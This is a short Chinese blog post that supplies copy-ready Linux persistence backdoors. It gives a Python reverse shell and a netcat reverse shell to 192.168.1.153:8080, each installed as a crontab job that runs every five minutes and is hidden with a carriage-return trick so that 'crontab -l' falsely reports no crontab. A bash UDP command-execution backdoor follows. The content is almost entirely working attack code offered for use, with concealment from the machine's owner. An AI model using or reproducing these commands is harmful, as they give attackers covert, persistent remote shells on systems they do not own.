TCP反弹后门
//python版本,kali下面测试成功,tcp 8080: (crontab -l;printf "*/5 * * * * /usr/bin/python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.153\",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);‘;\rno crontab for `whoami`%100c\n")|crontab -
//nc版本,tcp 8080 kali下面测试成功:
(crontab -l;printf "*/5 * * * * /bin/nc 192.168.1.153 8080 -e /bin/sh;\rno crontab for `whoami`%100c\n")|crontab -
//任务写入/var/spool/cron/crontabs/$username,,每隔5分钟运行一次,crontab -l //直接提示no crontab for $username:
crontab -r //移除所有的计划任务
一般在/etc/crontab文件里面测试成功的语句就可以使用
bash udp反弹后门
#!/bin/bash exec 9<> /dev/udp/localhost/8080 [ $? -eq 1 ] && exit echo "connect ok" >&9 while : do a=`dd bs=200 count=1 <&9 2>/dev/null` if echo "$a"|grep "exit"; then break; fi echo `$a` >&9 done exec 9>&- exec 9<&-
本文出自 “Sanr” 博客,请务必保留此出处http://0x007.blog.51cto.com/6330498/1611463
原文地址:http://0x007.blog.51cto.com/6330498/1611463